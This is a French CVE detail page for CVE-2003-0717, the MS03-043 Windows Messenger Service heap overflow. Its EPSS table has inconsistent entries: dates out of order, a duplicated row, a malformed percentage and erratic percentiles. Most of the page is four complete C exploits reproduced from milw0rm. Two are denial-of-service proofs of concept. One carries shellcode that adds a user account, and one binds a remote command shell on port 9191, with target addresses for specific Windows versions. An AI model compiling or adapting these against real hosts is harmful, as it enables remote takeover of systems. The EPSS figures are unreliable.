CVE-2003-0717 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	60.62%	–	–
2023-03-12	–	–	–	97.16%	–
2024-03-31	–	–	–	97.11%	–
2024-06-02	–	–	–	97.11%	–
2024-12-22	–	–	–	95.63%	–
2025-03-02	–	–	–	95.29%	–
2025-01-19	–	–	–	95.63%	–
2025-03-09	–	–	–	95.29%	–
2025-03-18	–	–	–	–	84.32%
2025-03-30	–	–	–	–	81.91%
2025-05-29	–	–	–	–	79.15%
2025-05-29	–	–	–	–	79.15,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	1%
2024-03-31	1%
2024-06-02	1%
2024-12-22	1%
2025-03-02	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	99%
2025-03-30	99%
2025-05-29	99%
2025-05-29	99%

/* Mon Oct 20 14:26:55 NZDT 2003 Re-written By VeNoMouS to be ported to linux, and tidy it up a little. This was only like a 5 minute port but it works and has been tested. venomgen-x.co.nz <mailto:venomgen-x.co.nz> greets to str0ke and defy DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // 40 : unique id over 16 bytes ? "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // 74 : fields length "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" // 0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // 8 : field length int usage(char *name) { printf("Proof of Concept for Windows Messenger Service Overflow..\n"); printf("- Originally By Hanabishi Recca - reccamail.ru\n\n <mailto:reccamail.ru\n\n> "); printf("- Ported to linux by VeNoMouS..\n"); printf("- venomgen-x.co.nz\n\n\n <mailto:venomgen-x.co.nz\n\n\n> "); printf("example : %s -d yourputtersux -i 10.33.10.4 -s n0nlameputer\n",name); printf("\n-d <dest netbios name>\t-i <dest netbios ip>\n"); printf("-s <src netbios name>\n"); return 1; } int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; char from[57],machine[57],c; char body[4096] = "*** MESSAGE ***"; if(argc <= 2) { usage(argv[0]); exit(0); } while ((c = getopt (argc, argv, "d:i:s:h")) != EOF) switch(c) { case 'd': strncpy(machine,optarg,sizeof(machine)); printf("Machine is %s\n",machine); break; case 'i': memset(&addr, 0,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(optarg); addr.sin_port = htons(135); break; case 's': strncpy(from,optarg,sizeof(from)); break; case 'h': usage(argv[0]); exit(0); break; } // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 if(!addr.sin_addr.s_addr) { printf("Ummm MOFO we need a dest IP...\n"); exit(0); } if(!strlen(machine)) { printf("Ummmm we also need the dest netbios name bro...\n"); exit(0); } if(!strlen(from)) strcpy(from,"tolazytotype"); memset(packet,0, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body),packet_size, fields_size); if ((s = socket (AF_INET, SOCK_DGRAM, 0)) == -1 ) { perror("Error socket() - "); exit(0); } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("Error sendto() - "); exit(0); } exit(0); } // milw0rm.com [2004-08-08]

/* DoS Proof of Concept for MS03-043 - exploitation shouldn't be too hard. Launching it one or two times against the target should make the machine reboot. Tested against a Win2K SP4. "The vulnerability results because the Messenger Service does not properly validate the length of a message before passing it to the allocated buffer" according to MS bulletin. Digging into it a bit more, we find that when a character 0x14 in encountered in the 'body' part of the message, it is replaced by a CR+LF. The buffer allocated for this operation is twice the size of the string, which is the way to go, but is then copied to a buffer which was only allocated 11CAh bytes. Thanks to that, we can bypass the length checks and overflow the fixed size buffer. Credits go to LSD :) */ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> // Packet format found thanks to a bit a sniffing static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ? "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // @74 : fields length "\x00\x00"; // Exploit downloaded on www.k-otik.com unsigned char field_header[] = "\xff\xff\xff\xff" // @0 : field length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // @8 : field length int main(int argc,char *argv[]) { int i, packet_size, fields_size, s; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; WSADATA wsaData; WSAStartup(0x0202, &wsaData); ZeroMemory(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr("192.168.186.3"); addr.sin_port = htons(135); ZeroMemory(packet, sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 fprintf(stdout, "Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; fprintf(stdout, "Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); /* for (i = 0; i < packet_size; i++) { if (i && ((i & 1) == 0)) fprintf(stdout, " "); if (i && ((i & 15) == 0)) fprintf(stdout, "\n"); fprintf(stdout, "%02x", packet[i]); } fprintf(stdout, "\n"); */ if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) exit(EXIT_FAILURE); if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) exit(EXIT_FAILURE); /* if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) == -1) exit(EXIT_FAILURE); */ exit(EXIT_SUCCESS); } // milw0rm.com [2003-10-18]

/*******************************************************************/ /* [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt] */ /* --------------------------------------------------------------- */ /* */ /* This Sploit use the unhandledexceptionfilter to redirect */ /* the execution. When overflow occur we have : */ /* */ /* mov eax,esi+8 */ /* mov ecx,esi+Ch */ /* mov dword ptr ds:[ecx],eax */ /* */ /* so we control ecx and edx and we can write 4 bytes */ /* where we want. */ /* If we try to write in a not writable memory zone, an */ /* excepetion is lauched and unhandledexceptionfilter too. */ /* */ /* A part of unhandledexceptionfilter : */ /* */ /* mov eax, dword_0_77ECF44C(=where) */ /* cmp eax, ebx */ /* jz short loc_0_77EA734C */ /* push esi */ /* call eax */ /* */ /* So we write the "WHAT"(=jmp esi+4Ch) at */ /* the "WHERE"(=77EA734C here) and when the exception occur */ /* the unhandledexceptionfilter is lauched so when call eax */ /* occur, it execute our code. */ /* */ /* Thx Kotik who coded the proof of concept,and Metasploit */ /* for Shellcode and last but not least kralor,Scurt from Crpt */ /* */ /* Tested on win2k FR SP0 */ /* */ /* */ /*******************************************************************/ #ifdef _WIN32 #include <winsock.h> #include <windows.h> #pragma comment (lib,"ws2_32") #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <netdb.h> #include <sys/timeb.h> #include <string.h> #endif static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" "\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff" "\x00\x00\x00\x00" "\xff\xff\xff\xff"; unsigned char ShellCode[] = // XorDecode 23 bytes "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x96\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" // AddUser:X Pass:X "\xf0\x17\x7a\x16\x96\x1f\x70\x7e\x21\x96\x96\x96\x1f\x90\x1f\x55" "\xc5\xfe\xe8\x4e\x74\xe5\x7e\x2b\x96\x96\x96\x1f\xd0\x9a\xc5\xfe" "\x18\xd8\x98\x7a\x7e\x39\x96\x96\x96\x1f\xd0\x9e\xa7\x4d\xc5\xfe" "\xe6\xff\xa5\xa4\xfe\xf8\xf3\xe2\xf7\xc2\x69\x46\x1f\xd0\x92\x1f" "\x55\xc5\xfe\xc8\x49\xea\x5b\x7e\x1a\x96\x96\x96\x1f\xd0\x86\xc5" "\xfe\x41\xab\x9a\x55\x7e\xe8\x96\x96\x96\x1f\xd0\x82\xa7\x56\xa7" "\x4d\xd5\xc6\xfe\xe4\x96\xe5\x96\xfe\xe2\x96\xf9\x96\xfe\xe4\x96" "\xf7\x96\xfe\xe5\x96\xe2\x96\xfe\xf8\x96\xff\x96\xfe\xfb\x96\xff" "\x96\xfe\xd7\x96\xf2\x96\x1f\xf0\x8a\xc6\xfe\xce\x96\x96\x96\x1f" "\x77\x1f\xd8\x8e\xfe\x96\x96\xca\x96\xc6\xc5\xc6\xc6\xc5\xc6\xc7" "\xc7\x1f\x77\xc6\xc2\xc7\xc5\xc6\x69\xc0\x86\x1d\xd8\x8e\xdf\xdf" "\xc7\x1f\x77\xfc\x97\xc7\xfc\x95\x69\xe0\x8a\xfc\x96\x69\xc0\x82" "\x69\xc0\x9a\xc0\xfc\xa6\xcf\xf2\x1d\x97\x1d\xd6\x9a\x1d\xe6\x8a" "\x3b\x1d\xd6\x9e\xc8\x54\x92\x96\xc5\xc3\xc0\xc1\x1d\xfa\xb2\x8e" "\x1d\xd3\xaa\x1d\xc2\x93\xee\x97\x7c\x1d\xdc\x8e\x1d\xcc\xb6\x97" "\x7d\x75\xa4\xdf\x1d\xa2\x1d\x97\x78\xa7\x69\x6a\xa7\x56\x3a\xae" "\x76\xe2\x91\x57\x59\x9b\x97\x51\x7d\x64\xad\xea\xb2\x82\xe3\x77" "\x1d\xcc\xb2\x97\x7d\xf0\x1d\x9a\xdd\x1d\xcc\x8a\x97\x7d\x1d\x92" "\x1d\x97\x7e\x7d\x94\xa7\x56\x1f\x7c\xc9\xc8\xcb\xcd\x54\x9e\x96"; int main(int argc,char *argv[]) { int i, packet_size, fields_size, s,sp; unsigned char packet[8192]; struct sockaddr_in addr; // A few conditions : // 0 <= strlen(from) + strlen(machine) <= 56 // max fields size 3992 char from[] = "RECCA"; char machine[] = "ZEUS"; char body[4096] = "*** MESSAGE ***"; #ifdef _WIN32 WSADATA wsaData; #endif if(argc<2) { printf("\t [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]\n"); printf("\t\t www.coromputer.net && Undernet #coromputer\n"); printf("---------------------------------------------------------------\n"); printf("Tested on Windows 2000 French Sp0\n\n"); printf("Downloaded from www.K-OTik.com\n"); printf("Syntax : %s <ip>\n",argv[0]); return -1; } #ifdef _WIN32 if(WSAStartup(0x101,&wsaData)) { printf("error: unable to load winsock.\n"); return -1; } #endif memset(&addr,0x00,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); addr.sin_port = htons(135); memset(packet,0x00,sizeof(packet)); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of 4 printf("Max 'body' size (incl. terminal NULL char) = %d\n", 3992 - packet_size + sizeof(packet_header) - sizeof(field_header)); memset(body, 0x14, sizeof(body)); body[2263]=(char)0x90; body[2264]=(char)0x90; body[2265]=(char)0x90; body[2266]=(char)0x90; body[2267]=(char)0x90; body[2268]=(char)0x90; //jmp 8 bytes plus loing body[2269]=(char)0xeb; body[2270]=(char)0x08; //WHAT CRYPTSVC.dll Win2k sp0 FRENCH body[2271]=(char)0x48; body[2272]=(char)0x65; body[2273]=(char)0x87; body[2274]=(char)0x76; //WHERE win2k sp0 FRENCH body[2275]=(char)0x4C; body[2276]=(char)0xF4; body[2277]=(char)0xEC; body[2278]=(char)0x77; for(i=2279;i<2606;i++) body[i]=ShellCode[i-2279]; body[3992 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; printf("Total length of strings = %d\nPacket size = %d\nFields size = %d\n", strlen(from) + strlen(machine) + strlen(body), packet_size, fields_size); if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("error: unable to create socket\n"); return -1; } if (sendto(s, packet, packet_size, 0, (struct sockaddr *)&addr, sizeof(addr)) == -1) { printf("error: unable to send packet\n"); return -1; } return 0; } // milw0rm.com [2003-12-16]

// source: https://www.securityfocus.com/bid/8826/info Microsoft Windows Messenger Service is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of messages before they are passed to an internal buffer. Exploitation could result in a denial of service or in execution of malicious code in Local System context, potentially allowing for full system compromise. /************************************************************************************ Exploit for Microsoft Windows Messenger Heap Overflow (MS03-043) based on PoC DoS by recca@mail.ru by Adik < netmaniac [at] hotmail.kg > http://netninja.to.kg Binds command shell on port 9191 Tested on Windows XP Professional SP1 English version Windows 2000 Professional SP3 English version access violation -> unhandledexceptionfilter -> -> call [esi+48h]/call [edi+6ch] (win2kSP3/WinXPSP1) -> longjmp -> shellcode attach debugger and c how it flows :) worked fine for me -[25/Oct/2003]- ************************************************************************************/ #include <stdio.h> #include <winsock.h> #include <string.h> #include <time.h> #pragma comment(lib,"ws2_32") #define VER "0.7" /**************** bind shellcode spawns shell on port 9191 ************************/ unsigned char kyrgyz_bind_code[] = { 0xEB,0x03,0x5D,0xEB,0x05,0xE8,0xF8,0xFF,0xFF,0xFF,0x8B,0xC5,0x83,0xC0,0x11,0x33,0xC9,0x66,0xB9, 0xC9,0x01,0x80,0x30,0x88,0x40,0xE2,0xFA, 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAB, 0x6F, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88 }; int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH); int main(int argc,char *argv[]) { int sockUDP,ver,c, packetsz,cnt; unsigned char packet[8192]; struct sockaddr_in targetUDP; WSADATA wsaData; struct { char os[30]; DWORD SEH; DWORD JMP; } targetOS[] = { { "Windows 2000 SP 3 (en)", 0x77ee044c, // unhandledexceptionfilter pointer 0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e }, { "Windows XP SP 1 (en)", 0x77ed73b4, 0x7804bf52 //rpcrt4.dll call [edi+6c] }/*, { //not tested "Windows XP SP 0 (en)", 0x77ed63b4, 0x7802ff3d //rpcrt4 call [edi+6c] }*/ }; printf("\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n" " by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER); if(argc < 3) { printf(" Target OS version:\n\n"); for(c=0;c<(sizeof(targetOS)/sizeof(targetOS[0]));c++) printf(" [%d]\t%s\n",c,targetOS[c].os); printf("\n Usage: %s [TargetIP] [ver: 0 | 1]\n" " eg: msgr.exe 192.168.63.130 0\n",argv[0]); return 1; } ver = atoi(argv[2]); printf("[*] Target: \t IP: %s\t OS: %s\n" "[*] UEF: \t 0x%x\n" "[*] JMP: \t 0x%x\n\n", argv[1],targetOS[ver].os, targetOS[ver].SEH, targetOS[ver].JMP); WSAStartup(0x0202, &wsaData); printf("[*] WSAStartup initialized...\n"); ZeroMemory(&targetUDP, sizeof(targetUDP)); targetUDP.sin_family = AF_INET; targetUDP.sin_addr.s_addr = inet_addr(argv[1]); targetUDP.sin_port = htons(135); packetsz = PreparePacket(packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH); if ((sockUDP = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { printf("[x] Socket not initialized! Exiting...\n"); return 1; } printf("[*] Socket initialized...\n"); printf("[*] Injecting packet into a remote process...\n"); if (sendto(sockUDP, packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1) { printf("[x] Failed to inject packet! Exiting...\n"); return 1; } else printf("[*] Packet injected...\n"); printf("[i] Try connecting to %s:9191\n\n",argv[1]); return 0; } /************************************************************************************/ int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH) { static unsigned char packet_header[] = "\x04\x00\x28\x00" "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0" "\x4f\xb6\xe6\xfc\xff\xff\xff\xff\x42\x69\x73\x68\x6b\x65\x6b\x32" "\x30\x30\x33\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"; unsigned char field_header[] = "\xff\xff\xff\xff\x00\x00\x00\x00" "\xff\xff\xff\xff"; int packet_size,i,fields_size; char from[] = "NETMANIAC"; char machine[] = "ADIK"; char longjmp[] ="\x90\x90\x90\x90\x90" "\xEB\x03\x58\xEB\x05\xE8\xF8\xFF\xFF\xFF" "\xB9\xFF\xFF\xFF\xFF\x81\xE9\x7F\xEE\xFF" "\xFF\x2B\xC1\xFF\xE0"; char shortjmp[] ="\x90\x90\x90\x90\xEB\x10\x90\x90\x90\x90\x90\x90"; char body[5000] = "*** MESSAGE ***";//4096 ZeroMemory(packet, sizeofpacket); packet_size = 0; memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1); packet_size += sizeof(packet_header) - 1; i = strlen(from) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], from); packet_size += (((i - 1) >> 2) + 1) << 2; i = strlen(machine) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], machine); packet_size += (((i - 1) >> 2) + 1) << 2; memset(body, 0x90, 2296); memcpy(&body[500],kyrgyz_bind_code,sizeof(kyrgyz_bind_code)); memset(&body[2296],0x14,1800); memcpy(&body[2296+1110],shortjmp,sizeof(shortjmp)); *(DWORD *)&body[2296+1121] = Jmp; *(DWORD *)&body[2296+1125] = SEH; memcpy(&body[2296+1129],longjmp,sizeof(longjmp)-1); fprintf(stdout, "[*] Msg body size: %d\n", 3656 - packet_size + sizeof(packet_header) - sizeof(field_header)); body[3656 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0'; i = strlen(body) + 1; *(unsigned int *)(&field_header[0]) = i; *(unsigned int *)(&field_header[8]) = i; memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1); packet_size += sizeof(field_header) - 1; strcpy(&packet[packet_size], body); packet_size += i; fields_size = packet_size - (sizeof(packet_header) - 1); *(unsigned int *)(&packet[40]) = time(NULL); *(unsigned int *)(&packet[74]) = fields_size; return packet_size; } /************************************************************************************/